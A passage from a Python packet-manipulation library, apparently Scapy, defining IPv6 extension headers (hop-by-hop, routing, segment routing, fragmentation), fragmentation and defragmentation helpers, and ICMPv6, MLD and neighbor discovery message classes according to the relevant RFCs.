u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[0]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = raw(ph6)
return checksum(ph6s + p)
#############################################################################
#############################################################################
# Extension Headers #
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPv6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
# IPv6 options for Extension Headers #
_hbhopts = {0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option"}
class _OTypeField(ByteEnumField):
"""
Modified BytEnumField that displays information regarding the IPv6 option
based on its option type value (What should be done by nodes that process
the option if they do not understand it ...)
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route"}
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from=lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
As specified in section 4.2 of RFC 2460, every options has
an alignment requirement usually expressed xn+y, meaning
the Option Type must appear at an integer multiple of x octets
from the start of the header, plus y octets.
That function is provided the current position from the
start of the header and returns required padding length.
"""
return 0
@classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt:
o = orb(_pkt[0]) # Option type
if o in _hbhoptcls:
return _hbhoptcls[o]
return cls
def extract_padding(self, p):
return b"", p
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
def extract_padding(self, p):
return b"", p
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from=lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
def extract_padding(self, p):
return b"", p
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message", # noqa: E501
68: "NSIS NATFW NSLP",
69: "MPLS OAM",
65535: "Reserved"})]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501
# TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501
# TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2
y = 0
delta = x * ((curpos - y + x - 1) // x) + y - curpos
return delta
def extract_padding(self, p):
return b"", p
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None)]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4
y = 2
delta = x * ((curpos - y + x - 1) // x) + y - curpos
return delta
def extract_padding(self, p):
return b"", p
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::")]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8
y = 6
delta = x * ((curpos - y + x - 1) // x) + y - curpos
return delta
def extract_padding(self, p):
return b"", p
_hbhoptcls = {0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO}
# Hop-by-Hop Extension Header #
class _OptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, *args, **kargs):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, *args, **kargs)
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except Exception:
autopad = 1
if not autopad:
return b"".join(map(str, x))
curpos = self.curpos
s = b""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00' * (d - 2)))
pstr = raw(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00' * (d - 2)))
return s
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], HBHOptUnknown, 2,
length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
overload_fields = {IPv6: {"nh": 0}}
# Destination Option Header #
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], HBHOptUnknown, 2,
length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
overload_fields = {IPv6: {"nh": 60}}
# Routing Header #
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501
IP6ListField("addresses", [],
length_from=lambda pkt: 8 * pkt.len)]
overload_fields = {IPv6: {"nh": 43}}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
# Segment Routing Header #
# This implementation is based on RFC8754, but some older snippets come from:
# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
_segment_routing_header_tlvs = {
# RFC 8754 sect 8.2
0: "Pad1 TLV",
1: "Ingress Node TLV", # draft 06
2: "Egress Node TLV", # draft 06
4: "PadN TLV",
5: "HMAC TLV",
}
class IPv6ExtHdrSegmentRoutingTLV(Packet):
name = "IPv6 Option Header Segment Routing - Generic TLV"
# RFC 8754 sect 2.1
fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
ByteField("len", 0),
StrLenField("value", "", length_from=lambda pkt: pkt.len)]
def extract_padding(self, p):
return b"", p
registered_sr_tlv = {}
@classmethod
def register_variant(cls):
cls.registered_sr_tlv[cls.type.default] = cls
@classmethod
def dispatch_hook(cls, pkt=None, *args, **kargs):
if pkt:
tmp_type = ord(pkt[:1])
return cls.registered_sr_tlv.get(tmp_type, cls)
return cls
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
# draft-ietf-6man-segment-routing-header-06 3.1.1
fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
ByteField("len", 18),
ByteField("reserved", 0),
ByteField("flags", 0),
IP6Field("ingress_node", "::1")]
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Egress Node TLV"
# draft-ietf-6man-segment-routing-header-06 3.1.2
fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
ByteField("len", 18),
ByteField("reserved", 0),
ByteField("flags", 0),
IP6Field("egress_node", "::1")]
class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Pad1 TLV"
# RFC8754 sect 2.1.1.1
fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs),
FieldLenField("len", None, length_of="padding", fmt="B"),
StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - PadN TLV"
# RFC8754 sect 2.1.1.2
fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
FieldLenField("len", None, length_of="padding", fmt="B"),
StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - HMAC TLV"
# RFC8754 sect 2.1.2
fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
FieldLenField("len", None, length_of="hmac",
adjust=lambda _, x: x + 48),
BitField("D", 0, 1),
BitField("reserved", 0, 15),
IntField("hmackeyid", 0),
StrLenField("hmac", "",
length_from=lambda pkt: pkt.len - 48)]
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Segment Routing"
# RFC8754 sect 2. + flag bits from draft 06
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteField("type", 4),
ByteField("segleft", None),
ByteField("lastentry", None),
BitField("unused1", 0, 1),
BitField("protected", 0, 1),
BitField("oam", 0, 1),
BitField("alert", 0, 1),
BitField("hmac", 0, 1),
BitField("unused2", 0, 3),
ShortField("tag", 0),
IP6ListField("addresses", ["::1"],
count_from=lambda pkt: (pkt.lastentry + 1)),
PacketListField("tlv_objects", [],
IPv6ExtHdrSegmentRoutingTLV,
length_from=lambda pkt: 8 * pkt.len - 16 * (
pkt.lastentry + 1
))]
overload_fields = {IPv6: {"nh": 43}}
def post_build(self, pkt, pay):
if self.len is None:
# The extension must be align on 8 bytes
tmp_mod = (-len(pkt) + 8) % 8
if tmp_mod == 1:
tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
pkt += raw(tlv)
elif tmp_mod >= 2:
# Add the padding extension
tmp_pad = b"\x00" * (tmp_mod - 2)
tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
pkt += raw(tlv)
tmp_len = (len(pkt) - 8) // 8
pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
if self.segleft is None:
tmp_len = len(self.addresses)
if tmp_len:
tmp_len -= 1
pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
if self.lastentry is None:
lastentry = len(self.addresses)
if lastentry == 0:
warning(
"IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
)
else:
lastentry -= 1
pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
# Fragmentation Header #
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None)]
overload_fields = {IPv6: {"nh": 44}}
def guess_payload_class(self, p):
if self.offset > 0:
return Raw
else:
return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
def defragment6(packets):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
Crap is dropped. What lacks is completed by 'X' characters.
"""
# Remove non fragments
lst = [x for x in packets if IPv6ExtHdrFragment in x]
if not lst:
return []
id = lst[0][IPv6ExtHdrFragment].id
llen = len(lst)
lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
if len(lst) != llen:
warning("defragment6: some fragmented packets have been removed from list") # noqa: E501
# reorder fragments
res = []
while lst:
min_pos = 0
min_offset = lst[0][IPv6ExtHdrFragment].offset
for p in lst:
cur_offset = p[IPv6ExtHdrFragment].offset
if cur_offset < min_offset:
min_pos = 0
min_offset = cur_offset
res.append(lst[min_pos])
del(lst[min_pos])
# regenerate the fragmentable part
fragmentable = b""
for p in res:
q = p[IPv6ExtHdrFragment]
offset = 8 * q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501
fragmentable += b"X" * (offset - len(fragmentable))
fragmentable += raw(q.payload)
# Regenerate the unfragmentable part.
q = res[0].copy()
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
del q[IPv6ExtHdrFragment].underlayer.payload
q /= conf.raw_layer(load=fragmentable)
del(q.plen)
if q[IPv6].underlayer:
q[IPv6] = IPv6(raw(q[IPv6]))
else:
q = IPv6(raw(q))
return q
def fragment6(pkt, fragSize):
"""
Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
expected maximum size of fragment data (MTU). The list of packets is
returned.
If packet does not contain an IPv6ExtHdrFragment class, it is added to
first IPv6 layer found. If no IPv6 layer exists packet is returned in
result list unmodified.
"""
pkt = pkt.copy()
if IPv6ExtHdrFragment not in pkt:
if IPv6 not in pkt:
return [pkt]
layer3 = pkt[IPv6]
data = layer3.payload
frag = IPv6ExtHdrFragment(nh=layer3.nh)
layer3.remove_payload()
del(layer3.nh)
del(layer3.plen)
frag.add_payload(data)
layer3.add_payload(frag)
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501
return []
s = raw(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = pkt[IPv6ExtHdrFragment].nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
del fragHeader.payload # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
# Cut the fragmentable part to fit fragSize. Inner fragments have
# a length that is an integer multiple of 8 octets. last Frag MTU
# can be anything below MTU
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart / fragHeader / fragPart]
remain = fragPartStr
res = []
fragOffset = 0 # offset, incremeted during creation
fragId = random.randint(0, 0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize // 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
res.append(tempo)
else:
fragHeader.offset = fragOffset # update offSet
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
res.append(tempo)
break
return res
#############################################################################
#############################################################################
# ICMPv6* Classes #
#############################################################################
#############################################################################
icmp6typescls = {1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery", # MLDv1 or MLDv2
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
# 138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
143: "ICMPv6MLReport2",
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
# 148: Do Me - SEND related - RFC 3971
# 149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
# 154: Do Me - FMIPv6 Messages - RFC 5568
155: "ICMPv6RPL", # RFC 6550
}
icmp6typesminhdrlen = {1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
# 139:
# 140
141: 8,
142: 8,
143: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4,
155: 4
}
icmp6types = {1: "Destination unreachable",
2: "Packet too big",
3: "Time exceeded",
4: "Parameter problem",
100: "Private Experimentation",
101: "Private Experimentation",
128: "Echo Request",
129: "Echo Reply",
130: "MLD Query",
131: "MLD Report",
132: "MLD Done",
133: "Router Solicitation",
134: "Router Advertisement",
135: "Neighbor Solicitation",
136: "Neighbor Advertisement",
137: "Redirect Message",
138: "Router Renumbering",
139: "ICMP Node Information Query",
140: "ICMP Node Information Response",
141: "Inverse Neighbor Discovery Solicitation Message",
142: "Inverse Neighbor Discovery Advertisement Message",
143: "MLD Report Version 2",
144: "Home Agent Address Discovery Request Message",
145: "Home Agent Address Discovery Reply Message",
146: "Mobile Prefix Solicitation",
147: "Mobile Prefix Advertisement",
148: "Certification Path Solicitation",
149: "Certification Path Advertisement",
151: "Multicast Router Advertisement",
152: "Multicast Router Solicitation",
153: "Multicast Router Termination",
155: "RPL Control Message",
200: "Private Experimentation",
201: "Private Experimentation"}
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum is None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2] + struct.pack("!H", chksum) + p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self, p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ByteEnumField("type", 1, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
StrField("msgbody", "")]
# RFC 2460 #
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ByteEnumField("type", 1, icmp6types),
ByteEnumField("code", 0, {0: "No route to destination",
1: "Communication with destination administratively prohibited", # noqa: E501
2: "Beyond scope of source address", # noqa: E501
3: "Address unreachable",
4: "Port unreachable"}),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused", 0)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ByteEnumField("type", 2, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
IntField("mtu", 1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ByteEnumField("type", 3, icmp6types),
ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501
1: "fragment reassembly time exceeded"}), # noqa: E501
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused", 0)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ByteEnumField("type", 4, icmp6types),
ByteEnumField(
"code", 0,
{0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered",
3: "first fragment has incomplete header chain"}),
XShortField("cksum", None),
IntField("ptr", 6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", 0),
XShortField("seq", 0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
# ICMPv6 Multicast Listener Discovery (RFC2710) #
# tous les messages MLD sont emis avec une adresse source lien-locale
# -> Y veiller dans le post_build si aucune n'est specifiee
# La valeur de Hop-Limit doit etre de 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr", "::")]
# general queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000 # 10s for mrd
mladdr = "::"
overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
def answers(self, query):
"""Check the query type"""
return ICMPv6MLQuery in query
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
class ICMPv6MLQuery2(_ICMPv6): # RFC 3810
name = "MLDv2 - Multicast Listener Query"
fields_desc = [ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 10000),
ShortField("reserved", 0),
IP6Field("mladdr", "::"),
BitField("Resv", 0, 4),
BitField("S", 0, 1),
BitField("QRV", 0, 3),
ByteField("QQIC", 0),
ShortField("sources_number", None),
IP6ListField("sources", [],
count_from=lambda pkt: pkt.sources_number)]
# RFC8810 - 4. Message Formats
overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
def post_build(self, packet, payload):
"""Compute the 'sources_number' field when needed"""
if self.sources_number is None:
srcnum = struct.pack("!H", len(self.sources))
packet = packet[:26] + srcnum + packet[28:]
return _ICMPv6.post_build(self, packet, payload)
class ICMPv6MLDMultAddrRec(Packet):
name = "ICMPv6 MLDv2 - Multicast Address Record"
fields_desc = [ByteField("rtype", 4),
FieldLenField("auxdata_len", None,
length_of="auxdata",
fmt="B"),
FieldLenField("sources_number", None,
length_of="sources",
adjust=lambda p, num: num // 16),
IP6Field("dst", "::"),
IP6ListField("sources", [],
length_from=lambda p: 16 * p.sources_number),
StrLenField("auxdata", "",
length_from=lambda p: p.auxdata_len)]
def default_payload_class(self, packet):
"""Multicast Address Record followed by another one"""
return self.__class__
class ICMPv6MLReport2(_ICMPv6): # RFC 3810
name = "MLDv2 - Multicast Listener Report"
fields_desc = [ByteEnumField("type", 143, icmp6types),
ByteField("res", 0),
XShortField("cksum", None),
ShortField("reserved", 0),
ShortField("records_number", None),
PacketListField("records", [],
ICMPv6MLDMultAddrRec,
count_from=lambda p: p.records_number)]
# RFC8810 - 4. Message Formats
overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
def post_build(self, packet, payload):
"""Compute the 'records_number' field when needed"""
if self.records_number is None:
recnum = struct.pack("!H", len(self.records))
packet = packet[:6] + recnum + packet[8:]
return _ICMPv6.post_build(self, packet, payload)
def answers(self, query):
"""Check the query type"""
return isinstance(query, ICMPv6MLQuery2)
# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None)]
overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None)]
overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
# ICMPv6 Neighbor Discovery (RFC 2461) #
icmp6ndopts = {1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recursive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
# 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
